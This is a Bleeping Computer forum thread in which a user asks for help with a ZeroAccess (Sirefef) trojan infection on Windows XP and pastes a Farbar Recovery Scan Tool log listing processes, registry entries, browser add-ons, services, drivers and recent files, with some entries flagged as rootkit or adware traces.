Threat found! a variant of Sirefef.GC trojan


  • This topic is locked
25 replies to this topic

#1 trussardi15

trussardi15

  • Members
  • 13 posts
  • OFFLINE
  • Local time:02:58 PM

Posted 29 May 2014 - 09:06 AM

Hello Master and Sensei! I need some help!

 

First of all, my PC started showing errors like "dll... not a valid Windows image" every time I opened a program.

Second, my Avira reported a threat called ZeroAccess, if I am not mistaken; even though I tried to remove and close it, it keeps showing up.

And then I tried to install ESET Smart Security to replace my Avira, and now ESS is showing at least 90 notifications about a threat like this:

 

Threat found!!

Object: Operating memory >> services.exe(884)

Threat: a variant of Win32/Sirefef.GC trojan

Information: cleaned by deleting-quarantined.

 

I already read a similar topic about this and tried to follow the same instructions, but I am afraid that I will make some mistakes, so I wrote my own topic about this.

Your help is very meaningful to me.

Thanks

Best Regards

Aiven


Edited by trussardi15, 29 May 2014 - 09:07 AM.




#2 Bud_91

Bud_91

  • Malware Response Team
  • 438 posts
  • OFFLINE
  • Gender:Male
  • Local time:03:58 AM

Posted 29 May 2014 - 09:52 AM

Hello and welcome to Bleeping Computer. I am sorry that you are having troubles with your computer and will try my best to help you. I know that being infected is very frustrating, but I will be here to help you through the whole process of cleaning. Removing malware can be difficult and complicated and will most likely take many steps, so please stick with me until I have declared your computer clean. I always recommend printing my instructions before following them in case you cannot keep this webpage open. Please be sure to always follow all steps exactly as they are written and let me know what happens each time. Stop and ask if something unexpected happens or if you are unsure of how to proceed.
 
Please respect my volunteered time and stay with me until I declare your computer clean. If you are going to be delayed for a while, please let me know.
 
Can you get this scan to run? If not, let me know and we will try another method.
 

Please download Farbar Recovery Scan Tool and save it to your desktop.
 
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.
  • Double-click to run it. When the tool opens, click Yes to the disclaimer.
  • Press the Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run from. Please copy and paste it into your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.


If I have not responded to your log in 36 hours, feel free to send me a PM.

If you would like to make a thank-you donation, please click here.

A.K.A. Buddierdl @ GeeksToGo.com


#3 trussardi15

trussardi15

  • Topic Starter
  • Members
  • 13 posts
  • OFFLINE
  • Local time:02:58 PM

Posted 29 May 2014 - 07:49 PM

Hello Bud! Thanks for your reply and help!

Okay, I already scanned it. When you said I need to attach it, do you mean I need to copy and paste it in here, or should I just simply attach it?

Thanks

Best Regards

Aiven



#4 Bud_91

Bud_91

  • Malware Response Team
  • 438 posts
  • OFFLINE
  • Gender:Male
  • Local time:03:58 AM

Posted 29 May 2014 - 09:06 PM

Please copy/paste the log. :)




#5 trussardi15

trussardi15

  • Topic Starter
  • Members
  • 13 posts
  • OFFLINE
  • Local time:02:58 PM

Posted 29 May 2014 - 09:34 PM

Hello. Here is the log.

     

    Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:30-05-2014
    Ran by Gery (administrator) on HOMESWEETHOME on 30-05-2014 09:19:36
    Running from C:\Documents and Settings\Gery\Desktop
    Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English(US)
    Internet Explorer Version 8
    Boot Mode: Normal
     
    The only official download link for FRST:
    Download link from any site other than Bleeping Computer is unpermitted or outdated.
     
    ==================== Processes (Whitelisted) =================
     
    (ATI Technologies Inc.) C:\WINDOWS\system32\ati2evxx.exe
    (The Within Network, LLC) C:\WINDOWS\UnsignedThemesSvc.exe
    (ATI Technologies Inc.) C:\WINDOWS\system32\ati2evxx.exe
    (ESET) C:\Program Files\ESET\ESET Smart Security\ekrn.exe
    (Oracle Corporation) C:\Program Files\Java\jre7\bin\jqs.exe
    (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
    (Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
    (NCSOFT Corporation) C:\Program Files\NCWest\NCLauncher\NCUpdateHelper.exe
    (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
    (Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
    (ESET) C:\Program Files\ESET\ESET Smart Security\egui.exe
    (Microsoft Corporation) C:\WINDOWS\system32\conime.exe
    () D:\Games\GARENA HON\GameData\GarenaMessenger.exe
    (LINE Corporation) C:\Program Files\Naver\LINE\Line.exe
    (BitTorrent Inc.) C:\Documents and Settings\Gery\Application Data\uTorrent\uTorrent.exe
    (Tonec Inc.) C:\Program Files\Internet Download Manager\IDMan.exe
    (Yahoo! Inc.) C:\PROGRA~1\Yahoo!\MESSEN~1\Ymsgr_tray.exe
    (ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
    (Tonec Inc.) C:\Program Files\Internet Download Manager\IEMonitor.exe
    (Google Inc.) C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
    (腾讯计算机系统有限公司) D:\Games\BNS\£áé_ìú\剑灵_腾讯\TCLS\Launcher.exe
    () D:\Games\BNS\£áé_ìú\剑灵_腾讯\TCLS\TenProtect\TenSafe_1.exe
     
     
    ==================== Registry (Whitelisted) ==================
     
    HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2011-12-05] (Advanced Micro Devices, Inc.)
    HKLM\...\Run: [NCUpdateHelper] => C:\Program Files\NCWest\NCLauncher\NCUpdateHelper.exe [528360 2013-08-25] (NCSOFT Corporation)
    HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
    HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-12-21] (Adobe Systems Incorporated)
    HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET Smart Security\egui.exe [5075104 2014-02-24] (ESET)
    HKLM\...\runonceex: [TITLE] - Set Up Software
    Winlogon\Notify\AtiExtEvent: C:\WINDOWS\system32\Ati2evxx.dll (ATI Technologies Inc.)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [Google Update] => C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [116648 2012-08-14] (Google Inc.)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [Messenger (Yahoo!)] => C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe [6595928 2012-05-25] (Yahoo! Inc.)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [GarenaPlus] => D:\Games\GARENA HON\GameData\GarenaMessenger.exe [9936176 2014-04-29] ()
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [Steam] => C:\Program Files\Steam\steam.exe [1775808 2014-05-28] (Valve Corporation)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [Line] => C:\Program Files\Naver\LINE\Line.exe [3948904 2014-04-29] (LINE Corporation)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [Google Update*] => [X] <===== ATTENTION (ZeroAccess rootkit hidden path)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [uTorrent] => C:\Documents and Settings\Gery\Application Data\uTorrent\uTorrent.exe [1272400 2014-05-15] (BitTorrent Inc.)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [IDMan] => C:\Program Files\Internet Download Manager\IDMan.exe [3821136 2013-11-30] (Tonec Inc.)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Policies\Explorer\Run: [FLT] => C:\Documents and Settings\Gery\Application Data\4102C4\4102C4.exe [32768 2008-04-14] (Microsoft Corporation)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\MountPoints2: {b44f8ed2-0b10-11e2-99cb-001cc09e9dd6} - I:\.\autorun.exe
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\MountPoints2: {ff40af84-12dc-11e3-9b09-001cc09e9dd6} - H:\setup.exe
     
    ==================== Internet (Whitelisted) ====================
     
    HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://id.rd.yahoo.com/customize/ycomp/defaults/sp/*http://id.yahoo.com
    SearchScopes: HKCU - DefaultScope {09E8BE24-9549-4608-B858-3B97D77AC1BC} URL = http://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=b1ie7
    SearchScopes: HKCU - {09E8BE24-9549-4608-B858-3B97D77AC1BC} URL = http://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=b1ie7
    BHO: IDM integration (IDMIEHlprObj Class) - {0055C089-8582-441B-A0BF-17B458C2A3A8} - C:\Program Files\Internet Download Manager\IDMIECC.dll (Internet Download Manager, Tonec Inc.)
    BHO: No Name - {02478D38-C3F9-4efb-9B51-7695ECA05670} -  No File
    BHO: Java™ Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
    BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
    BHO: Java™ Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
    Toolbar: HKCU - &Address - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - C:\WINDOWS\system32\browseui.dll (Microsoft Corporation)
    Toolbar: HKCU - &Links - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - C:\WINDOWS\system32\SHELL32.dll (Microsoft Corporation)
    Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
    Winsock: Catalog5 03 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
    Winsock: Catalog9 01 mswsock.dll File Not found ()
    Winsock: Catalog9 02 mswsock.dll File Not found ()
    Winsock: Catalog9 03 mswsock.dll File Not found ()
    Winsock: Catalog9 04 mswsock.dll File Not found ()
    Winsock: Catalog9 05 mswsock.dll File Not found ()
    Winsock: Catalog9 06 mswsock.dll File Not found ()
    Winsock: Catalog9 07 mswsock.dll File Not found ()
    Winsock: Catalog9 08 mswsock.dll File Not found ()
    Winsock: Catalog9 09 mswsock.dll File Not found ()
    Winsock: Catalog9 10 mswsock.dll File Not found ()
    Winsock: Catalog9 11 mswsock.dll File Not found ()
    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\..\Interfaces\{92FC92ED-CF99-4401-B1B9-D8CAB595F2D5}: [NameServer]8.8.8.8,8.8.4.4
     
    FireFox:
    ========
    FF ProfilePath: C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default
    FF Plugin: @adobe.com/FlashPlayer - C:\WINDOWS\system32\Macromed\Flash\NPSWF32_13_0_0_214.dll ()
    FF Plugin: @java.com/DTPlugin,version=10.51.2 - C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
    FF Plugin: @java.com/JavaPlugin,version=10.51.2 - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
    FF Plugin: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 - C:\Program Files\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
    FF Plugin: @microsoft.com/WPF,version=3.5 - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
    FF Plugin: @qq.com/TXSSO - C:\Program Files\Common Files\Tencent\TXSSO\1.2.1.89\Bin\npSSOAxCtrlForPTLogin.dll (Tencent)
    FF Plugin: @t.garena.com/garenatalk - D:\Games\GARENA HON\GameData\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll ( Garena)
    FF Plugin: @videolan.org/vlc,version=2.0.0 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
    FF Plugin: @videolan.org/vlc,version=2.1.3 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
    FF Plugin: Adobe Reader - C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
    FF Plugin HKCU: @tools.google.com/Google Update;version=3 - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin HKCU: @tools.google.com/Google Update;version=9 - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin HKCU: @unity3d.com/UnityPlayer,version=1.0 - C:\Documents and Settings\Gery\Local Settings\Application Data\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
    FF user.js: detected! => C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default\user.js
    FF Extension: Bruowsee2save - C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default\Extensions\joiqeii@whth.co.uk [2013-04-01]
    FF Extension: Yahoo! Toolbar - C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default\Extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1} [2014-04-04]
    FF Extension: Cookies Manager+ - C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default\Extensions\{bb6bc1bb-f824-4702-90cd-35e2fb24f25d} [2013-08-09]
    FF Extension: Charles Autoconfiguration - C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default\Extensions\{3e9a3920-1b27-11da-8cd6-0800200c9a66}.xpi [2012-11-19]
    FF HKLM\...\Firefox\Extensions: [OKitSpace@Vittalia.es] - C:\Documents and Settings\Gery\Application Data\okitspace\Firefox
    FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\
    FF Extension: Microsoft .NET Framework Assistant - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\ []
    FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird
    FF Extension: ESET Smart Security Extension - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird [2014-05-29]
    FF HKCU\...\Firefox\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Documents and Settings\Gery\Application Data\IDM\idmmzcc5
    FF Extension: IDM CC - C:\Documents and Settings\Gery\Application Data\IDM\idmmzcc5 [2014-05-03]
    FF HKCU\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Documents and Settings\Gery\Application Data\IDM\idmmzcc5
    FF Extension: IDM CC - C:\Documents and Settings\Gery\Application Data\IDM\idmmzcc5 [2014-05-03]
     
    Chrome: 
    =======
    CHR HomePage: hxxp://www2.delta-search.com/?babsrc=HP_ss&mntrId=C441001CC09E9DD6&affID=124741&tsp=5010
    CHR StartupUrls: "hxxp://www.google.com/"
    CHR Plugin: (Shockwave Flash) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\Application\35.0.1916.114\PepperFlash\pepflashplayer.dll ()
    CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
    CHR Plugin: (Native Client) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\Application\35.0.1916.114\ppGoogleNaClPluginChrome.dll ()
    CHR Plugin: (Chrome PDF Viewer) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\Application\35.0.1916.114\pdf.dll ()
    CHR Plugin: (Microsoft DRM) - C:\Program Files\Windows Media Player\npdrmv2.dll (Microsoft Corporation)
    CHR Plugin: (Windows Media Player Plug-in Dynamic Link Library) - C:\Program Files\Windows Media Player\npdsplay.dll (Microsoft Corporation (written by Digital Renaissance Inc.))
    CHR Plugin: (Microsoft DRM) - C:\Program Files\Windows Media Player\npwmsdrm.dll (Microsoft Corporation)
    CHR Plugin: (Google Update) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
    CHR Plugin: (Java™ Platform SE 7 U7) - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
    CHR Plugin: (VLC Web Plugin) - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
    CHR Plugin: (Shockwave Flash) - C:\WINDOWS\system32\Macromed\Flash\NPSWF32_11_6_602_180.dll No File
    CHR Plugin: (Java Deployment Toolkit 7.0.70.10) - C:\WINDOWS\system32\npDeployJava1.dll No File
    CHR Plugin: (Garena Talk Plugin) - D:\Games\GARENA HON\GameData\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll ( Garena)
    CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-23]
    CHR Extension: (Google Search) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-06-13]
    CHR Extension: (IDM Integration Module) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jeaohhlajejodfjadcponpnjgkiikocn [2014-05-03]
    CHR Extension: (AsunaxKuroyukihime) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nedobobpfkomoelpnhlkmnfpghbnecge [2013-06-13]
    CHR Extension: (Google Wallet) - C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
    CHR HKLM\...\Chrome\Extension: [jeaohhlajejodfjadcponpnjgkiikocn] - C:\Program Files\Internet Download Manager\IDMGCExt.crx [2013-11-29]
    CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
     
    ========================== Services (Whitelisted) =================
     
    R2 ekrn; C:\Program Files\ESET\ESET Smart Security\ekrn.exe [1343408 2014-02-24] (ESET)
    R2 JavaQuickStarterService; C:\Program Files\Java\jre7\bin\jqs.exe [182696 2013-12-18] (Oracle Corporation)
    R3 Nla; C:\WINDOWS\System32\mswsock.dll [245248 2008-04-14] ()
    S3 npggsvc; C:\WINDOWS\system32\GameMon.des [5110192 2012-10-31] (INCA Internet Co., Ltd.)
    R2 UnsignedThemes; C:\WINDOWS\UnsignedThemesSvc.exe [21096 2009-07-13] (The Within Network, LLC)
    S2 Update sizlsearch; "C:\Program Files\sizlsearch\updatesizlsearch.exe" [X]
    S2 Util sizlsearch; "C:\Program Files\sizlsearch\bin\utilsizlsearch.exe" [X]
    S2 *etadpug; "C:\Program Files\Google\Desktop\Install\{5be576b1-8633-ed43-6e4f-980ec4dd552d}\   \   \???\{5be576b1-8633-ed43-6e4f-980ec4dd552d}\GoogleUpdate.exe" < <==== ATTENTION (ZeroAccess)
     
    ==================== Drivers (Whitelisted) ====================
     
    S3 1394hub; C:\WINDOWS\System32\svchost.exe [14336 2008-04-14] (Microsoft Corporation)
    S3 Ambfilt; C:\WINDOWS\System32\drivers\Ambfilt.sys [1691480 2009-11-18] (Creative)
    S3 apf003; C:\WINDOWS\system32\apf003.sys [13232 2013-01-24] ()
    R3 AtiHDAudioService; C:\WINDOWS\System32\drivers\AtihdXP3.sys [100368 2011-12-20] (Advanced Micro Devices)
    R0 Bhbase; C:\WINDOWS\System32\drivers\Bhbase.sys [47456 2013-09-03] (Baidu, Inc.)
    R1 eamon; C:\WINDOWS\System32\DRIVERS\eamon.sys [184664 2013-09-17] (ESET)
    R1 ehdrv; C:\WINDOWS\System32\DRIVERS\ehdrv.sys [134248 2013-09-17] (ESET)
    R1 ElbyCDIO; C:\WINDOWS\System32\Drivers\ElbyCDIO.sys [26024 2009-12-18] (Elaborate Bytes AG)
    R2 epfw; C:\WINDOWS\System32\DRIVERS\epfw.sys [174400 2013-09-17] (ESET)
    R3 Epfwndis; C:\WINDOWS\System32\DRIVERS\Epfwndis.sys [38952 2013-09-17] (ESET)
    R1 epfwtdi; C:\WINDOWS\System32\DRIVERS\epfwtdi.sys [61600 2013-09-17] (ESET)
    R1 FsVga; C:\WINDOWS\System32\DRIVERS\fsvga.sys [12160 2007-07-29] (Microsoft Corporation)
    R1 IDMTDI; C:\WINDOWS\System32\DRIVERS\idmtdi.sys [121184 2013-11-28] (Tonec Inc.)
    S3 Monfilt; C:\WINDOWS\System32\drivers\Monfilt.sys [1395800 2009-11-18] (Creative Technology Ltd.)
    S3 pwdrvio; C:\WINDOWS\system32\pwdrvio.sys [15576 2012-06-18] ()
    S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [10200 2012-06-18] ()
    R0 SmartDefragDriver; C:\WINDOWS\System32\Drivers\SmartDefragDriver.sys [14776 2010-11-26] ()
    S3 TesSafe; C:\WINDOWS\system32\TesSafe.sys [931640 2014-05-30] (TENCENT)
    S3 tmusbnet; C:\WINDOWS\System32\DRIVERS\tmusbnet.sys [109568 2010-04-20] (QUALCOMM Incorporated)
    R2 uxpatch; C:\WINDOWS\system32\drivers\uxpatch.sys [25448 2009-07-13] ()
    R1 {9d5747ee-0448-4681-8337-1555de75a3b6}Gt; C:\WINDOWS\System32\drivers\{9d5747ee-0448-4681-8337-1555de75a3b6}Gt.sys [55232 2014-05-06] (StdLib)
    S3 BprotectEx; \??\C:\WINDOWS\System32\drivers\BprotectEx.sys [X]
    S3 EagleNT; \??\C:\DOCUME~1\Gery\LOCALS~1\Temp\EagleNT.sys [X]
    S3 EagleXNt; \??\C:\WINDOWS\system32\drivers\EagleXNt.sys [X]
    S3 GGSAFERDriver; \??\D:\Games\GARENA HON\GameData\Room\safedrv.sys [X]
    S4 IntelIde; No ImagePath
    S3 PCFApiUtil; \??\C:\Program Files\Baidu Security\PC Faster\3.7.0.0\PCFApiUtil.sys [X]
    S3 tmnsusbser; system32\DRIVERS\tmnsusbser.sys [X]
    S3 XDva401; \??\C:\WINDOWS\system32\XDva401.sys [X]
    S3 xhunter1; \??\C:\WINDOWS\xhunter1.sys [X]
     
    ==================== NetSvcs (Whitelisted) ===================
     
     
    ==================== One Month Created Files and Folders ========
     
    2014-05-30 07:45 - 2014-05-30 07:45 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\Application Data\ESET
    2014-05-30 07:29 - 2014-05-30 09:19 - 00017945 _____ () C:\Documents and Settings\Gery\Desktop\FRST.txt
    2014-05-30 07:29 - 2014-05-30 09:19 - 00000000 ____D () C:\FRST
    2014-05-30 07:28 - 2014-05-30 07:28 - 01056256 _____ (Farbar) C:\Documents and Settings\Gery\Desktop\FRST.exe
    2014-05-29 21:00 - 2014-05-29 21:01 - 00688992 _____ (Swearware) C:\Documents and Settings\Gery\Desktop\dds.com
    2014-05-29 19:32 - 2014-05-29 19:32 - 00000000 ____D () C:\Documents and Settings\Gery\Local Settings\Application Data\ESET
    2014-05-29 19:32 - 2014-05-29 19:32 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\ESET
    2014-05-29 19:31 - 2014-05-29 19:31 - 00000000 ____D () C:\Documents and Settings\LocalService\Local Settings\Application Data\ESET
    2014-05-29 19:30 - 2014-05-30 07:45 - 00000000 ____D () C:\WINDOWS\LastGood.Tmp
    2014-05-29 19:30 - 2014-05-29 19:41 - 00005809 _____ () C:\WINDOWS\setupapi.log
    2014-05-29 19:28 - 2014-05-29 19:28 - 00000000 ____D () C:\Program Files\ESET
    2014-05-29 19:28 - 2014-05-29 19:28 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\ESET
    2014-05-29 19:28 - 2014-05-29 19:28 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\ESET
    2014-05-29 13:00 - 2014-05-29 17:54 - 00000600 _____ () C:\Documents and Settings\Gery\Local Settings\Application Data\PUTTY.RND
    2014-05-28 22:03 - 2014-05-28 22:03 - 00329096 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
    2014-05-28 17:31 - 2014-05-30 07:43 - 00000241 _____ () C:\WINDOWS\WindowsUpdate.log
    2014-05-28 16:31 - 2013-10-05 00:29 - 00421744 _____ (Network Tunnel Lab) C:\WINDOWS\system32\networkdlllsp.dll
    2014-05-28 16:08 - 2014-05-30 08:56 - 00000000 __SHD () C:\Documents and Settings\Gery\wc
    2014-05-28 16:08 - 2014-05-29 16:08 - 00000000 __SHD () C:\Documents and Settings\Gery\Application Data\wyUpdate AU
    2014-05-28 16:08 - 2014-05-28 17:24 - 00000000 __SHD () C:\Documents and Settings\Gery\Local Settings\Application Data\icsxml
    2014-05-28 16:08 - 2014-05-28 16:08 - 00088336 _____ () C:\Documents and Settings\Gery\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
    2014-05-28 16:08 - 2014-05-28 16:08 - 00000038 ___SH () C:\Documents and Settings\Gery\Local Settings\Application Data\1754111884ee9ab5277ca00.95260103
    2014-05-28 16:08 - 2014-05-28 16:08 - 00000000 ____D () C:\Documents and Settings\Gery\Local Settings\Application Data\BattlePing
    2014-05-28 16:07 - 2014-05-28 16:07 - 00000712 _____ () C:\Documents and Settings\All Users\Desktop\BattlePing.lnk
    2014-05-28 16:07 - 2014-05-28 16:07 - 00000000 ____D () C:\Program Files\BattlePing
    2014-05-28 16:07 - 2014-05-28 16:07 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\BattlePing
    2014-05-27 17:20 - 2014-05-29 16:07 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\腾讯软件
    2014-05-27 17:19 - 2014-05-27 17:19 - 00000000 ____D () C:\Program Files\Tencent
    2014-05-22 11:35 - 2014-05-06 16:40 - 00055232 _____ (StdLib) C:\WINDOWS\system32\Drivers\{9d5747ee-0448-4681-8337-1555de75a3b6}Gt.sys
    2014-05-22 10:04 - 2014-05-28 22:03 - 00000000 ____D () C:\Program Files\sizlsearch
    2014-05-16 15:59 - 2014-05-16 15:59 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\17173
    2014-05-16 09:41 - 2014-05-16 09:41 - 00000000 ____D () C:\WINDOWS\system32\mssymbols
    2014-05-15 21:58 - 2014-05-15 21:58 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\LokiReborn
    2014-05-15 21:56 - 2014-05-29 17:48 - 00002175 _____ () C:\Documents and Settings\All Users\Desktop\China English Patch.lnk
    2014-05-15 20:37 - 2014-05-15 20:37 - 00000732 _____ () C:\Documents and Settings\Gery\Desktop\剑灵_腾讯.lnk
    2014-05-15 20:37 - 2014-05-15 20:37 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\腾讯游戏
    2014-05-15 18:47 - 2014-05-15 18:47 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\Microsoft AppLocale
    2014-05-15 17:51 - 2014-05-27 17:20 - 00000000 ____D () C:\Program Files\Common Files\Tencent
    2014-05-15 17:01 - 2014-05-15 17:01 - 00000000 ____D () C:\Documents and Settings\All Users\Tencent
    2014-05-15 17:00 - 2014-05-29 18:07 - 00000040 _____ () C:\Documents and Settings\All Users\Application Data\DT0001.dat
    2014-05-15 16:45 - 2014-05-29 18:06 - 00000040 _____ () C:\Documents and Settings\All Users\Application Data\DT0006.dat
    2014-05-15 16:33 - 2014-05-15 16:33 - 00000000 ____D () C:\WINDOWS\Minidump
    2014-05-15 14:52 - 2014-05-29 16:07 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\Tencent
    2014-05-15 14:52 - 2014-05-27 17:39 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Tencent
    2014-05-15 14:51 - 2014-05-15 14:51 - 00000000 ____D () C:\Documents and Settings\Gery\My Documents\BnS
    2014-05-15 14:50 - 2014-05-30 09:17 - 00931640 _____ (TENCENT) C:\WINDOWS\system32\TesSafe.sys
    2014-05-15 14:36 - 2014-05-15 14:39 - 00000000 ____D () C:\Documents and Settings\Gery\Local Settings\Application Data\Downloaded Installations
    2014-05-15 14:36 - 2014-05-15 14:36 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\ÌÚѶÓÎÏ·
    2014-05-15 12:51 - 2014-05-15 12:51 - 00000831 _____ () C:\Documents and Settings\Gery\Start Menu\µTorrent.lnk
    2014-05-03 18:36 - 2014-05-09 23:04 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\IDM
    2014-05-03 18:36 - 2014-05-03 18:37 - 00000000 ____D () C:\Program Files\Internet Download Manager
    2014-05-03 18:36 - 2014-05-03 18:36 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\Internet Download Manager
    2014-05-03 18:36 - 2014-05-03 18:36 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Internet Download Manager
    2014-05-03 18:36 - 2014-05-03 18:36 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\IDM
     
    ==================== One Month Modified Files and Folders =======
     
    2014-05-30 09:19 - 2014-05-30 07:29 - 00017945 _____ () C:\Documents and Settings\Gery\Desktop\FRST.txt
